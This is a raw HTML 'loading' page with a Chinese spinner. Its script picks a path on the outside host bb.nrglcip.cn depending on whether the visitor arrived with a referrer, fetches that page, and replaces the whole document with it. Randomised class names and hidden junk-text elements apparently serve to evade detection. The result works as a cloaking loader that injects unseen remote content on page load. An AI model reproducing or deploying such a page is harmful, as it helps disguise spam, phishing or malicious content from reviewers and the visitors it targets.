<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Kl6u3GW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Kl6u3GW .j12lj0HuuqN {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Kl6u3GW .content {
            line-height: 50px;
            text-align: center
        }

        .Kl6u3GW .img {
            width: 100%
        }

        .Kl6u3GW .U7TP6wAcSp {
            text-align: center
        }

        .Kl6u3GW .U7TP6wAcSp span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Kl6u3GW .U7TP6wAcSp span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Kl6u3GW .U7TP6wAcSp span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Kl6u3GW .U7TP6wAcSp span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Kl6u3GW .U7TP6wAcSp span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Kl6u3GW .U7TP6wAcSp span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Kl6u3GW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function vSNM2Ul6s(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var aAZMaxG = vSNM2Ul6s('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ aAZMaxG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ aAZMaxG +".html?a=share";
		}
		
        i8bHJsOk=url+"#"+new Date().getTime();
        i8bHJsOk && function() {
            $.get(i8bHJsOk, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >vhlC6d26v6FL6uCWxtx4ueR1tgyV8fsldvd0IHokVRWr35SDgctURuzKAa3RE79VIiGgIeFtzBfhZXn0dgsYRQx</h1>
<img  src='' style='display:none'>
<h1 style='display:none' >vhlC6d26v6FL6uCWxtx4ueR1tgyV8fsldvd0IHokVRWr35SDgctURuzKAa3RE79VIiGgIeFtzBfhZXn0dgsYRQx</h1>
<div style='display:none'>FzAtiJr7QBOYLwoBHXd9KJpW</div><div class="Kl6u3GW">
    <div class="j12lj0HuuqN">
        <div class="U7TP6wAcSp">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >fZKDF5wp0nUgDN4dBiV</h1>
<li style='display:none' >N7i0ddpz64n8a6NyKapM46Wuj9Si3A4xdyBz3wIm5toD8tsorM4F1EV73GZAsHHmoAIP9oquv</li>
<a  href='#' style='display:none'>nsRvFQtGURCrpcTnrI0B2n8fjPK0QDPO8a08</a>
<ul style='display:none' >tCEdKkD1Bu9iXdzqIfnGQKpALmE1HxgvbF5aL1OfKgSodp3</ul></body>
</html>